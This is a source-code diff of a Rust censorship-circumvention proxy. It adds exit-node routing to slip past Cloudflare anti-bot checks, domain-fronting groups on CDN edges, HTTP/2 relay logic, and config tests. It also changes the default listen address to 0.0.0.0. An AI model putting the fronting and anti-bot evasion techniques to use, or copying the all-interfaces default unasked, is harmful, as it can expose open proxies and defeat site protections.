+    ///    (Deno Deploy / fly.io / etc., non-Google IP) → destination`
+    ///
+    /// The destination sees the exit node's outbound IP, not Google's.
+    /// CF anti-bot's "this is a Google datacenter" heuristic doesn't
+    /// fire. mhrv-rs's DPI cover (Iran ISP only sees the SNI-rewritten
+    /// TLS to a Google IP) is unchanged — the second hop happens
+    /// inside Apps Script, invisible from the user's network.
+    ///
+    /// Setup walkthrough at `assets/exit_node/README.md`. Default off.
+    #[serde(default)]
+    pub exit_node: ExitNodeConfig,
+}
+
+/// Configuration for the optional second-hop exit node.
+#[derive(Debug, Clone, Default, Deserialize, Serialize)]
+pub struct ExitNodeConfig {
+    /// Master switch. Default false. Even with `relay_url` and `psk`
+    /// set, nothing routes through the exit node unless this is true.
+    #[serde(default)]
+    pub enabled: bool,
+
+    /// HTTPS URL of the exit-node endpoint. Typically a Deno Deploy /
+    /// fly.io serverless deployment (or your own VPS) running the
+    /// `assets/exit_node/exit_node.ts` script (or an equivalent). The
+    /// exit node is what makes the outbound `fetch()` call to the
+    /// destination, so its IP is what the destination sees.
+    #[serde(default)]
+    pub relay_url: String,
+
+    /// Pre-shared key — must match the `PSK` constant in the exit-node
+    /// script. Without a matching PSK the exit node refuses the request
+    /// (401). The PSK is what keeps the exit node from being usable as
+    /// an open proxy by anyone who learns its URL. Treat like a
+    /// password: do not commit, rotate if leaked. Generate with
+    /// `openssl rand -hex 32`.
+    #[serde(default)]
+    pub psk: String,
+
+    /// `"selective"` (default): only hosts in `hosts` go through the
+    /// exit node; everything else takes the regular Apps Script path.
+    /// Recommended — the exit-node hop adds ~200-500 ms per request,
+    /// so reserve it for sites that need a non-Google IP.
+    ///
+    /// `"full"`: every request goes through the exit node. Useful only
+    /// when the entire workload is CF-anti-bot affected, or when the
+    /// exit node happens to be faster than Apps Script alone for the
+    /// user's network path (rare but possible on very slow ISPs).
+    #[serde(default = "default_exit_node_mode")]
+    pub mode: String,
+
+    /// In `"selective"` mode, the list of destination hostnames that
+    /// route through the exit node. Matches exactly OR as a
+    /// dot-anchored suffix, mirroring `passthrough_hosts` semantics:
+    /// `"chatgpt.com"` covers `chatgpt.com` and `api.chatgpt.com` and
+    /// `auth.chatgpt.com` etc. Leading dots are stripped at load.
+    ///
+    /// The recurring CF-anti-bot list from community reports:
+    /// `chatgpt.com`, `claude.ai`, `x.com`, `grok.com`. Extend for
+    /// any other CF-blocked sites you need.
+    #[serde(default)]
+    pub hosts: Vec<String>,
+}
+
+fn default_exit_node_mode() -> String {
+    "selective".into()
+}
+
+/// One multi-edge fronting group. Edge CDNs like Vercel and Fastly
+/// host hundreds of tenants behind a single set of edge IPs and use
+/// the inner HTTP `Host` header (after TLS handshake) to dispatch to
+/// the right backend. Pick one neutral domain hosted on the same edge
+/// as `sni`; the cert it serves will be valid for that name (rustls
+/// validates against `sni`, not against the inner `Host`), and the
+/// edge will route based on the `Host` header.
+#[derive(Debug, Clone, Deserialize, Serialize)]
+pub struct FrontingGroup {
+    /// Human-readable name used in log lines. Free-form; uniqueness not
+    /// enforced but recommended.
+    pub name: String,
+    /// Edge IP to dial. A single IP for now — most edges have many but
+    /// one is enough to validate the technique. IP rotation per-group
+    /// can come later.
+    pub ip: String,
+    /// SNI to send on the outbound TLS handshake. Must be a real domain
+    /// served by the same edge as `domains`, otherwise the edge will
+    /// either refuse the handshake or serve a default page that 404s
+    /// the inner Host. Examples: `react.dev` for Vercel, `www.python.org`
+    /// for Fastly.
+    pub sni: String,
+    /// Member domain list. Matching is case-insensitive: an entry
+    /// matches the host exactly OR as an unconditional dot-anchored
+    /// suffix (`vercel.com` matches `app.vercel.com` too). Same shape
+    /// as the DoH host list.
+    ///
+    /// Canonical form for matching is lowercase and trailing-dot
+    /// trimmed; entries are normalized to that form once at proxy
+    /// startup. The on-disk representation is preserved as written
+    /// (we don't mutate the user's config), so `Vercel.com.` and
+    /// `vercel.com` both work — the matcher is the source of truth
+    /// for equality.
+    pub domains: Vec<String>,
 }
 
 fn default_fetch_ips_from_api() -> bool { false }
@@ -170,6 +493,42 @@ fn default_max_ips_to_scan() -> usize { 100 }
 fn default_scan_batch_size() -> usize {500}
 fn default_google_ip_validation() -> bool {true}
 
+/// Default for `tunnel_doh`: `true` (DoH stays inside the tunnel).
+/// Flipped from `false` in v1.9.0 per #468 — Iran ISPs filter direct
+/// connections to pinned DoH hosts (`dns.google`, `chrome.cloudflare-dns.com`,
+/// …) and the prior bypass-on default silently broke DNS for the
+/// dominant userbase. Users on networks where direct DoH works can
+/// opt back in with `tunnel_doh: false`.
+fn default_tunnel_doh() -> bool { true }
+
+/// Default for `block_quic`: `true`. QUIC over the TCP-based tunnel
+/// causes TCP-over-TCP meltdown (<1 Mbps). Browsers fall back to
+/// HTTPS/TCP within seconds of the silent UDP drop. Issue #793.
+fn default_block_stun() -> bool { true }
+fn default_block_quic() -> bool { true }
+
+/// Default for `block_doh`: `true` (browser DoH is rejected so the
+/// browser falls back to system DNS, which `tun2proxy` resolves
+/// instantly via virtual DNS — saves the ~1.5s tunnel round-trip per
+/// name lookup that #468's `tunnel_doh: true` default would otherwise
+/// pay). #773 — without this named-default function, `#[serde(default)]`
+/// on `bool` resolves to `false`, and existing configs upgrading to
+/// v1.9.13 silently lost the block-and-fall-back behaviour, paying
+/// the full DoH-via-Apps-Script penalty on every page load. Power
+/// users who specifically want browser DoH (with the latency cost)
+/// can opt back in by setting `block_doh: false`.
+fn default_block_doh() -> bool { true }
+
+/// Defaults for the auto-blacklist tuning knobs (#391, #444). These
+/// preserve historical behavior — `3 strikes / 30s window / 120s cooldown`.
+fn default_auto_blacklist_strikes() -> u32 { 3 }
+fn default_auto_blacklist_window_secs() -> u64 { 30 }
+fn default_auto_blacklist_cooldown_secs() -> u64 { 120 }
+
+/// Default for `request_timeout_secs`: 30s, matching the historical
+/// hard-coded `BATCH_TIMEOUT` and Apps Script's typical response cliff.
+fn default_request_timeout_secs() -> u64 { 30 }
+
 fn default_google_ip() -> String {
     "216.239.38.120".into()
 }
@@ -177,7 +536,7 @@ fn default_front_domain() -> String {
     "www.google.com".into()
 }
 fn default_listen_host() -> String {
-    "127.0.0.1".into()
+    "0.0.0.0".into()
 }
 fn default_listen_port() -> u16 {
     8085
@@ -226,9 +585,52 @@ impl Config {
             ));
         }
         if self.socks5_port == Some(self.listen_port) {
-            return Err(ConfigError::Invalid(
-                "listen_port and socks5_port must be different".into(),
-            ));
+            return Err(ConfigError::Invalid(format!(
+                "listen_port and socks5_port must differ on the same host \
+                 (both set to {} on {}). Change one of them in config.json.",
+                self.listen_port, self.listen_host
+            )));
+        }
+        for (i, g) in self.fronting_groups.iter().enumerate() {
+            if g.name.trim().is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}]: name is empty", i
+                )));
+            }
+            if g.ip.trim().is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): ip is empty", i, g.name
+                )));
+            }
+            if g.sni.trim().is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): sni is empty", i, g.name
+                )));
+            }
+            // Parse the SNI here so an invalid hostname fails the same
+            // load path the UI / `mhrv-rs` CLI both use, rather than
+            // surfacing later only when ProxyServer::new tries to build
+            // the TLS server name. Same fail-fast contract as the rest
+            // of validate(). The parse is cheap; runtime path repeats
+            // it once at proxy startup, idempotently.
+            if let Err(e) = ServerName::try_from(g.sni.clone()) {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): invalid sni '{}': {}",
+                    i, g.name, g.sni, e
+                )));
+            }
+            if g.domains.is_empty() {
+                return Err(ConfigError::Invalid(format!(
+                    "fronting_groups[{}] ('{}'): domains list is empty", i, g.name
+                )));
+            }
+            for d in &g.domains {
+                if d.trim().is_empty() {
+                    return Err(ConfigError::Invalid(format!(
+                        "fronting_groups[{}] ('{}'): empty domain entry", i, g.name
+                    )));
+                }
+            }
         }
         Ok(())
     }
@@ -236,10 +638,15 @@ impl Config {
     pub fn mode_kind(&self) -> Result<Mode, ConfigError> {
         match self.mode.as_str() {
             "apps_script" => Ok(Mode::AppsScript),
-            "google_only" => Ok(Mode::GoogleOnly),
+            "direct" => Ok(Mode::Direct),
+            // Deprecated alias. `google_only` was the name of `direct`
+            // before fronting_groups generalized the mode beyond
+            // Google's edge. Accepted forever so old configs keep
+            // working — the UI rewrites it on next save.
+            "google_only" => Ok(Mode::Direct),
             "full" => Ok(Mode::Full),
             other => Err(ConfigError::Invalid(format!(
-                "unknown mode '{}' (expected 'apps_script', 'google_only', or 'full')",
+                "unknown mode '{}' (expected 'apps_script', 'direct', or 'full')",
                 other
             ))),
         }
@@ -306,24 +713,36 @@ mod tests {
     }
 
     #[test]
-    fn parses_google_only_without_script_id() {
-        // Bootstrap mode: no script_id, no auth_key — both are only meaningful
+    fn parses_direct_without_script_id() {
+        // Direct mode: no script_id, no auth_key — both are only meaningful
         // once the Apps Script relay exists.
+        let s = r#"{
+            "mode": "direct"
+        }"#;
+        let cfg: Config = serde_json::from_str(s).unwrap();
+        cfg.validate().expect("direct must validate without script_id / auth_key");
+        assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct);
+    }
+
+    #[test]
+    fn google_only_alias_parses_as_direct() {
+        // Backwards compat: `direct` was named `google_only` before
+        // fronting_groups. Existing configs must continue to load.
         let s = r#"{
             "mode": "google_only"
         }"#;
         let cfg: Config = serde_json::from_str(s).unwrap();
-        cfg.validate().expect("google_only must validate without script_id / auth_key");
-        assert_eq!(cfg.mode_kind().unwrap(), Mode::GoogleOnly);
+        cfg.validate().expect("google_only alias must still validate");
+        assert_eq!(cfg.mode_kind().unwrap(), Mode::Direct);
     }
 
     #[test]
-    fn google_only_ignores_placeholder_script_id() {
+    fn direct_ignores_placeholder_script_id() {
         // UI round-trip: user saved config in apps_script with the placeholder,
-        // then switched mode to google_only. The placeholder should not block
-        // validation in the bootstrap mode.
+        // then switched mode to direct. The placeholder should not block
+        // validation in the no-relay mode.
         let s = r#"{
-            "mode": "google_only",
+            "mode": "direct",
             "script_id": "YOUR_APPS_SCRIPT_DEPLOYMENT_ID"
         }"#;
         let cfg: Config = serde_json::from_str(s).unwrap();
@@ -375,6 +794,68 @@ mod tests {
         assert!(cfg.validate().is_err());
     }
 
+    #[test]
+    fn fronting_groups_parse_and_validate() {
+        let s = r#"{
+            "mode": "direct",
+            "fronting_groups": [
+                {
+                    "name": "vercel",
+                    "ip": "76.76.21.21",
+                    "sni": "react.dev",
+                    "domains": ["vercel.com", "nextjs.org"]
+                }
+            ]
+        }"#;
+        let cfg: Config = serde_json::from_str(s).unwrap();
+        cfg.validate().unwrap();
+        assert_eq!(cfg.fronting_groups.len(), 1);
+        assert_eq!(cfg.fronting_groups[0].name, "vercel");
+        assert_eq!(cfg.fronting_groups[0].domains.len(), 2);
+    }
+
+    #[test]
+    fn fronting_group_rejects_invalid_sni_at_validate() {
+        // SNI must parse as a DNS hostname at the same fail-fast point
+        // as the rest of validate(), not later at proxy-startup time.
+        // The CLI and UI both run validate() on Save / before serve.
+        let s = r#"{
+            "mode": "direct",
+            "fronting_groups": [{
+                "name": "bad",
+                "ip": "1.2.3.4",
+                "sni": "not a valid hostname",
+                "domains": ["x.com"]
+            }]
+        }"#;
+        let cfg: Config = serde_json::from_str(s).unwrap();
+        let err = cfg.validate().expect_err("invalid sni must fail validate()");
+        let msg = format!("{}", err);
+        assert!(msg.contains("invalid sni"), "error should mention invalid sni: {}", msg);
+    }
+
+    #[test]
+    fn fronting_group_rejects_empty_fields() {
+        for bad in [
+            r#"{ "name": "", "ip": "1.2.3.4", "sni": "a.b", "domains": ["x.com"] }"#,
+            r#"{ "name": "n", "ip": "",       "sni": "a.b", "domains": ["x.com"] }"#,
+            r#"{ "name": "n", "ip": "1.2.3.4","sni": "",    "domains": ["x.com"] }"#,
+            r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": []        }"#,
+            r#"{ "name": "n", "ip": "1.2.3.4","sni": "a.b", "domains": ["  "]    }"#,
+        ] {
+            let s = format!(
+                r#"{{ "mode": "direct", "fronting_groups": [{}] }}"#,
+                bad
+            );
+            let cfg: Config = serde_json::from_str(&s).unwrap();
+            assert!(
+                cfg.validate().is_err(),
+                "expected validation error for: {}",
+                bad
+            );
+        }
+    }
+
     #[test]
     fn rejects_same_http_and_socks5_port() {
         let s = r#"{
@@ -432,6 +913,38 @@ mod rt_tests {
         let _ = std::fs::remove_file(&tmp);
     }
 
+    #[test]
+    fn force_http1_round_trips_through_config() {
+        let json = r#"{
+  "mode": "apps_script",
+  "google_ip": "216.239.38.120",
+  "front_domain": "www.google.com",
+  "script_id": "X",
+  "auth_key": "secretkey123",
+  "listen_host": "127.0.0.1",
+  "listen_port": 8085,
+  "log_level": "info",
+  "verify_ssl": true,
+  "force_http1": true
+}"#;
+        let cfg: Config = serde_json::from_str(json).unwrap();
+        assert!(cfg.force_http1, "force_http1=true must round-trip");
+    }
+
+    #[test]
+    fn force_http1_defaults_false_when_omitted() {
+        // Existing configs from before v1.9.13 don't have the field.
+        // serde(default) must give false (h2 active) so older configs
+        // continue to work and unchanged users get the optimization.
+        let json = r#"{
+  "mode": "apps_script",
+  "auth_key": "secretkey123",
+  "script_id": "X"
+}"#;
+        let cfg: Config = serde_json::from_str(json).unwrap();
+        assert!(!cfg.force_http1, "default must be false (h2 enabled)");
+    }
+
     #[test]
     fn round_trip_minimal_fields_only() {
         // User saves with defaults for everything optional. This is what the
diff --git a/src/domain_fronter.rs b/src/domain_fronter.rs
index a18dd212..d472245d 100644
--- a/src/domain_fronter.rs
+++ b/src/domain_fronter.rs
@@ -6,8 +6,12 @@
 //! `/macros/s/{script_id}/exec`. Apps Script performs the actual upstream
 //! HTTP fetch server-side and returns a JSON envelope.
 //!
-//! TODO: add HTTP/2 multiplexing (`h2` crate) for lower latency.
-//! TODO: add parallel range-based downloads.
+//! Multiplexes over HTTP/2 when the relay edge agrees via ALPN; falls back
+//! to HTTP/1.1 keep-alive when h2 is refused or fails. Range-parallel
+//! downloads are implemented by `relay_parallel_range_to` (writer-based,
+//! streams files larger than Apps Script's single-GET ceiling) with a
+//! buffered `relay_parallel_range` compatibility wrapper for callers that
+//! want a `Vec<u8>` back.
 
 use std::collections::HashMap;
 // AtomicU64 via portable-atomic: native on 64-bit / armv7, spinlock-
@@ -15,12 +19,14 @@ use std::collections::HashMap;
 // is identical to std::sync::atomic::AtomicU64 so call sites need
 // no other changes.
 use portable_atomic::AtomicU64;
-use std::sync::atomic::{AtomicUsize, Ordering};
+use std::sync::atomic::{AtomicBool, AtomicUsize, Ordering};
 use std::sync::Arc;
 use std::time::{Duration, Instant};
 
 use base64::engine::general_purpose::STANDARD as B64;
 use base64::Engine;
+use bytes::Bytes;
+use rand::{thread_rng, Rng, RngCore};
 use serde::{Deserialize, Serialize};
 use serde_json::Value;
 use tokio::io::{AsyncReadExt, AsyncWriteExt};
@@ -53,23 +59,235 @@ pub enum FronterError {
     Timeout,
     #[error("json: {0}")]
     Json(#[from] serde_json::Error),
+    /// Wraps another error and tells outer retry/fallback layers
+    /// (`do_relay_with_retry`, the exit-node→direct-Apps-Script
+    /// fallback in `relay()`) NOT to replay the request. Used when an
+    /// h2 attempt failed *after* `send_request` succeeded — the
+    /// request may have already reached and been processed by Apps
+    /// Script (or the exit node), and replaying via h1 / direct path
+    /// would duplicate side effects for non-idempotent methods.
+    ///
+    /// `Display` is transparent so error messages look identical to
+    /// the wrapped variant; tests/observability use `is_retryable()`
+    /// and `into_inner()` to introspect.
+    #[error(transparent)]
+    NonRetryable(Box<FronterError>),
+}
+
+impl FronterError {
+    /// True if outer retry/fallback layers may safely re-issue the
+    /// request. False for `NonRetryable(_)` — those errors signal
+    /// "request may have been sent; do not duplicate."
+    pub fn is_retryable(&self) -> bool {
+        !matches!(self, FronterError::NonRetryable(_))
+    }
+
+    /// Strip the `NonRetryable` wrapper, returning the underlying
+    /// error. Useful for surfacing the original message after the
+    /// retry/fallback policy has already done its job.
+    pub fn into_inner(self) -> FronterError {
+        match self {
+            FronterError::NonRetryable(inner) => *inner,
+            other => other,
+        }
+    }
 }
 
 type PooledStream = TlsStream<TcpStream>;
-const POOL_TTL_SECS: u64 = 45;
+const POOL_TTL_SECS: u64 = 60;
+const POOL_MIN: usize = 8;
+const POOL_REFILL_INTERVAL_SECS: u64 = 5;
 const POOL_MAX: usize = 80;
 const REQUEST_TIMEOUT_SECS: u64 = 25;
 const RANGE_PARALLEL_CHUNK_BYTES: u64 = 256 * 1024;
-// Keep synthetic range stitching bounded. Without this, a buggy or hostile
-// origin can advertise `Content-Range: bytes 0-1/<huge>` and make us build a
-// massive range plan or preallocate an enormous response buffer.
-const MAX_STITCHED_RANGE_BYTES: u64 = 64 * 1024 * 1024;
+/// HTTP/2 connection lifetime before we proactively reopen. Apps Script's
+/// edge has been observed to send GOAWAY at ~10 min anyway, so we cycle
+/// at 9 min to do an orderly reconnect on our schedule rather than
+/// letting an in-flight stream race a server-initiated close.
+const H2_CONN_TTL_SECS: u64 = 540;
+/// Bound on the h2 ready/back-pressure phase only. `SendRequest::ready()`
+/// awaits a free slot under the server's `MAX_CONCURRENT_STREAMS`. A
+/// stall here means the connection is overloaded (or dead at the
+/// muxer level) but no stream has been opened yet — RequestSent::No,
+/// safe to fall back to h1 without duplication risk. Kept short
+/// (5 s) so a saturated conn doesn't burn the caller's whole budget.
+///
+/// The post-send phase (response headers + body drain) uses the
+/// caller-supplied `response_deadline` instead — see
+/// `h2_round_trip`. This way a slow but legitimate Apps Script call
+/// isn't cut off at an arbitrary fixed cap, and Full-mode batches can
+/// honor the user's `request_timeout_secs` setting.
+const H2_READY_TIMEOUT_SECS: u64 = 5;
+/// Default response-phase deadline used by `relay_uncoalesced` callers
+/// (the Apps-Script direct path). Sized to be just under the outer
+/// `REQUEST_TIMEOUT_SECS` (25 s) so an h2 timeout still leaves a few
+/// seconds of outer budget for an h1 fallback round-trip when the
+/// caller chose to retry.
+const H2_RESPONSE_DEADLINE_DEFAULT_SECS: u64 = 20;
+/// Bound on the TCP connect + TLS handshake + h2 handshake phase. A
+/// blackholed `connect_host:443` previously stalled `ensure_h2` until
+/// the outer 25 s timeout fired (returning 504 without ever falling
+/// back). With this bound, a slow open trips after 8 s and the caller
+/// drops to h1 with ~17 s of outer budget to spare.
+const H2_OPEN_TIMEOUT_SECS: u64 = 8;
+/// After an h2 open failure, suppress further open attempts for this
+/// long. Prevents every concurrent caller during an h2 outage from
+/// paying its own full handshake-timeout cost in turn.
+const H2_OPEN_FAILURE_BACKOFF_SECS: u64 = 15;
+/// Same idea as `H2_OPEN_TIMEOUT_SECS` but for the legacy h1 socket
+/// path. Without this, a stuck TCP connect or TLS handshake to a
+/// blackholed `connect_host:443` would block `acquire()` (and the
+/// `warm()` prewarm loop) until the outer batch budget elapsed —
+/// the same symptom #924 hit during the warm-race window. Bounded
+/// here so a single hung handshake aborts fast and the loop / caller
+/// makes progress on the next attempt.
+const H1_OPEN_TIMEOUT_SECS: u64 = 8;
+/// Cadence for Apps Script container keepalive pings. Apps Script
+/// containers go cold after ~5min idle and cost 1-3s on the first
+/// request to wake back up — most painful on YouTube / streaming where
+/// the first chunk after a quiet pause stalls the player.
+const H1_KEEPALIVE_INTERVAL_SECS: u64 = 240;
+/// Largest response body Apps Script's `UrlFetchApp` will deliver before
+/// the script gets killed mid-execution. The hard wire ceiling is ~50 MiB;
+/// after base64 / envelope overhead and edge variance, the practical raw
+/// ceiling for a single GET sits around 40 MiB. This bounds the
+/// **writer-based** API's streaming threshold: above this, the buffered
+/// stitch path's single-GET fallback wouldn't fit through Apps Script
+/// even if invoked, so streaming chunks straight to the wire (with
+/// truncate-on-failure semantics the client can resume via Range)
+/// strictly beats today's 25 s timeout + 504 "Apps Script
+/// unresponsive" (#1042).
+const APPS_SCRIPT_BODY_MAX_BYTES: u64 = 40 * 1024 * 1024;
+
+/// Hard ceiling on how many bytes the streaming side of the
+/// range-parallel path will fetch for a single response. A hostile
+/// origin can advertise an absurd `Content-Range` total
+/// (`bytes 0-262143/<huge>`), pass our probe-checks with a normally-
+/// sized 256 KiB first-chunk body, and then drive us to keep issuing
+/// chunk Apps Script calls until the client disconnects. Each chunk
+/// is one Apps Script invocation, counting against the account's
+/// daily quota (~20 k requests/day on the free tier), so an
+/// unattended hostile download can exhaust the quota and lock the
+/// user out of the relay entirely.
+///
+/// 16 GiB is well above any legitimate single-file download a user
+/// is likely to do through a relay VPN (game patches, OS images,
+/// video files all fit) but small enough to bound worst-case quota
+/// drain to ~65 k chunks per pwned URL. Above this cap the streaming
+/// branch refuses the response with a 502 instead of plowing
+/// through.
+const MAX_STREAMED_RANGE_BYTES: u64 = 16 * 1024 * 1024 * 1024;
+
+/// Byte interval between `range-parallel-stream` progress log lines.
+/// Large downloads through the streaming branch otherwise look stuck
+/// in the logs (one "starting N chunks" line at the top, nothing
+/// until completion or failure). At 16 MiB intervals the operator sees
+/// ~6 lines per 100 MiB and ~64 lines per 1 GiB — useful pace at the
+/// ~1.4 MB/s typical through-relay throughput, and quiet enough that
+/// even a 16 GiB file won't drown the log (~1024 progress lines over
+/// the multi-hour download). Per user feedback on PR #1085.
+const STREAM_PROGRESS_LOG_INTERVAL_BYTES: u64 = 16 * 1024 * 1024;
+
+/// Hard ceiling on the buffered stitch buffer's `Vec::with_capacity(total)`
+/// allocation. Two roles:
+///
+///   1. Memory-safety cap. A hostile/buggy origin advertising
+///      `Content-Range: bytes 0-1/<huge>` could otherwise drive
+///      preallocation to enormous values; totals above this either
+///      stream (writer-based API) or fall back to a single GET
+///      (`Vec<u8>` compatibility wrapper, see
+///      [`DomainFronter::relay_parallel_range`]).
+///   2. Pre-1.9.23 compatibility floor for the `Vec<u8>` wrapper.
+///      Range-capable downloads in the 40-64 MiB band used to stitch
+///      successfully via the buffered path; collapsing this constant
+///      into [`APPS_SCRIPT_BODY_MAX_BYTES`] would have pushed those
+///      onto the single-GET fallback path, where Apps Script returns
+///      502/504 because they're above its 50 MiB response ceiling.
+///      Keeping the two cutoffs separate restores that band's
+///      working buffered behavior for wrapper callers.
+const BUFFERED_STITCH_MAX_BYTES: u64 = 64 * 1024 * 1024;
 
 struct PoolEntry {
     stream: PooledStream,
     created: Instant,
 }
 
+/// Single shared HTTP/2 connection to the Google edge. One TCP/TLS
+/// socket carries up to ~100 concurrent streams (server's
+/// `MAX_CONCURRENT_STREAMS` setting); each relay request takes a clone
+/// of the `SendRequest` handle and opens its own stream. Cheaper than
+/// the legacy per-request socket pool — no head-of-line blocking when
+/// a single Apps Script call stalls.
+///
+/// `generation` is monotonic per fronter and lets `poison_h2_if_gen`
+/// avoid the race where task A's stale failure clears task B's
+/// freshly-reopened healthy cell.
+///
+/// `dead` is set by the spawned connection-driver task when the h2
+/// `Connection` future ends (GOAWAY, network error, normal close).
+/// Without this, the cell silently held a dead `SendRequest` after a
+/// mid-session disconnect — the next request paid a wasted h2 round
+/// trip to detect it via `ready()` failure, AND `run_pool_refill`
+/// kept maintaining the small `POOL_MIN_H2_FALLBACK` (2-socket) pool
+/// instead of expanding to `POOL_MIN` (8). With the flag,
+/// `run_pool_refill` notices h2 is dead within one tick (≤5 s) and
+/// pre-warms the larger fallback pool before the next request burst,
+/// and `ensure_h2` short-circuits the `H2_CONN_TTL_SECS`-based
+/// liveness check on a known-dead cell.
+struct H2Cell {
+    send: h2::client::SendRequest<Bytes>,
+    created: Instant,
+    generation: u64,
+    dead: Arc<AtomicBool>,
+}
+
+/// "Did this request reach Apps Script?" signal carried out of every
+/// h2 failure so callers know whether replaying via h1 is safe.
+///
+/// - `No`: the failure occurred before `send_request` returned. The
+///   stream was never opened on the wire; replaying through h1 is
+///   guaranteed not to duplicate any side effect.
+/// - `Maybe`: `send_request` succeeded (headers queued for sending)
+///   but a later step failed — server may have already received the
+///   request and may already be processing it. Replaying a
+///   non-idempotent op (POST/PUT/DELETE, tunnel write, batch ops)
+///   risks duplicating side effects. Only safe to retry for methods
+///   that are idempotent by HTTP semantics.
+#[derive(Debug, Copy, Clone, PartialEq, Eq)]
+enum RequestSent {
+    No,
+    Maybe,
+}
+
+/// Typed errors from `open_h2`. Used so `ensure_h2` can recognize the
+/// "peer refused h2 in ALPN" outcome and sticky-disable the fast path
+/// without resorting to string matching across function boundaries.
+#[derive(Debug, thiserror::Error)]
+enum OpenH2Error {
+    #[error("ALPN did not negotiate h2; peer prefers http/1.1")]
+    AlpnRefused,
+    #[error("io: {0}")]
+    Io(#[from] std::io::Error),
+    #[error("tls: {0}")]
+    Tls(#[from] rustls::Error),
+    #[error("dns: {0}")]
+    Dns(#[from] rustls::pki_types::InvalidDnsNameError),
+    #[error("h2 handshake: {0}")]
+    Handshake(String),
+}
+
+impl From<OpenH2Error> for FronterError {
+    fn from(e: OpenH2Error) -> Self {
+        match e {
+            OpenH2Error::Io(e) => FronterError::Io(e),
+            OpenH2Error::Tls(e) => FronterError::Tls(e),
+            OpenH2Error::Dns(e) => FronterError::Dns(e),
+            OpenH2Error::AlpnRefused => FronterError::Relay("alpn refused h2".into()),
+            OpenH2Error::Handshake(m) => FronterError::Relay(format!("h2 handshake: {}", m)),
+        }
+    }
+}
+
 pub struct DomainFronter {
     connect_host: String,
     /// Pool of SNI domains to rotate through per outbound connection. All of
@@ -96,15 +314,82 @@ pub struct DomainFronter {
     /// Set once we've emitted the "UnknownIssuer means ISP MITM" hint,
     /// so we don't spam it every time a cert-validation error repeats.
     cert_hint_shown: std::sync::atomic::AtomicBool,
+    /// Connector used by `open_h2`: advertises ALPN `["h2", "http/1.1"]`
+    /// when the h2 fast path is enabled, else just `["http/1.1"]`. Never
+    /// used by the h1 pool path — see `tls_connector_h1`.
     tls_connector: TlsConnector,
+    /// Connector used by `open()` (h1 pool warm/refill/acquire). ALPN
+    /// is forced to `["http/1.1"]` so a Google edge that would have
+    /// preferred h2 still negotiates h1 here. Without this, pooled
+    /// sockets could end up speaking h2 frames after handshake, and
+    /// the `write_all(b"GET / HTTP/1.1\r\n...")` fallback would land
+    /// on a server that has no idea what we're doing.
+    tls_connector_h1: TlsConnector,
     pool: Arc<Mutex<Vec<PoolEntry>>>,
+    /// HTTP/2 fast path. `None` until first relay opens it; cleared on
+    /// connection failure or expiry so the next call reopens. Skipped
+    /// entirely when `force_http1` is set or when the peer refused h2
+    /// during ALPN (sticky `h2_disabled`).
+    h2_cell: Arc<Mutex<Option<H2Cell>>>,
+    /// Serializes "open a new h2 connection" attempts so that during
+    /// an outage, only one task pays the handshake cost — concurrent
+    /// callers see the lock contended via `try_lock` and fall through
+    /// to h1 immediately rather than queueing behind a slow handshake.
+    /// Distinct from `h2_cell` so the cell mutex is never held across
+    /// network I/O.
+    h2_open_lock: Arc<Mutex<()>>,
+    /// Wall-clock timestamp of the last failed `open_h2`. While within
+    /// `H2_OPEN_FAILURE_BACKOFF_SECS` of this, `ensure_h2` returns None
+    /// without retrying — prevents thundering-herd handshake attempts
+    /// during transient h2 outages.
+    h2_open_failed_at: Arc<Mutex<Option<Instant>>>,
+    /// Monotonic counter for `H2Cell::generation`. Each successful
+    /// `open_h2` increments and tags the new cell so `poison_h2_if_gen`
+    /// can avoid the race where a stale failure clears a freshly-opened
+    /// cell that another task just installed.
+    h2_generation: Arc<AtomicU64>,
+    /// Set when ALPN negotiates http/1.1 (peer refused h2) or when
+    /// `force_http1` is true. Sticky for the lifetime of the fronter:
+    /// once we know this peer doesn't speak h2, don't keep retrying
+    /// the handshake on every relay call.
+    h2_disabled: Arc<AtomicBool>,
     cache: Arc<ResponseCache>,
     inflight: Arc<Mutex<HashMap<String, broadcast::Sender<Vec<u8>>>>>,
     coalesced: AtomicU64,
     blacklist: Arc<std::sync::Mutex<HashMap<String, Instant>>>,
+    /// Per-deployment rolling timeout counter. Maps `script_id` →
+    /// `(window_start, strike_count)`. Reset when the window expires
+    /// or when a batch succeeds. Triggers a short-cooldown blacklist
+    /// at `TIMEOUT_STRIKE_LIMIT`. Distinct from `blacklist` because
+    /// strike state is per-deployment health bookkeeping, not the
+    /// permanent ban list.
+    script_timeouts: Arc<std::sync::Mutex<HashMap<String, (Instant, u32)>>>,
     relay_calls: AtomicU64,
     relay_failures: AtomicU64,
     bytes_relayed: AtomicU64,
+    /// Relay calls that successfully completed over the h2 fast path,
+    /// across **all** entry points: Apps-Script direct relays,
+    /// exit-node outer calls, full-mode tunnel single ops, and
+    /// full-mode tunnel batches.
+    ///
+    /// **Not** comparable to `relay_calls`: that counter only counts
+    /// the Apps-Script-direct path (incremented in `relay_uncoalesced`).
+    /// The other three paths bypass `relay_uncoalesced` entirely, so in
+    /// full-mode deployments `h2_calls` can exceed `relay_calls` —
+    /// reading their ratio as a "% on h2" gives a wrong number.
+    ///
+    /// To gauge h2 health, compute `h2_calls / (h2_calls + h2_fallbacks)`.
+    /// That's the success ratio across all transports; a healthy
+    /// deployment shows > 95 %.
+    h2_calls: AtomicU64,
+    /// Relay calls that attempted h2 but had to fall back to h1
+    /// (transient handshake failure, mid-stream error, conn poisoned,
+    /// open backoff, or `RequestSent::No` failure that the call site
+    /// chose to retry on h1). Same all-entry-points scope as
+    /// `h2_calls`. A persistently high `h2_fallbacks / (h2_calls +
+    /// h2_fallbacks)` ratio indicates an unhealthy h2 conn or a flaky
+    /// middlebox eating h2 frames; consider `force_http1: true`.
+    h2_fallbacks: AtomicU64,
     /// Per-host breakdown of traffic going through this fronter. Keyed by
     /// the host of the URL (e.g. "api.x.com"). Read-mostly; only touched
     /// on the slow path (once per relayed request), so a plain Mutex is
@@ -123,6 +408,36 @@ pub struct DomainFronter {
     today_calls: AtomicU64,
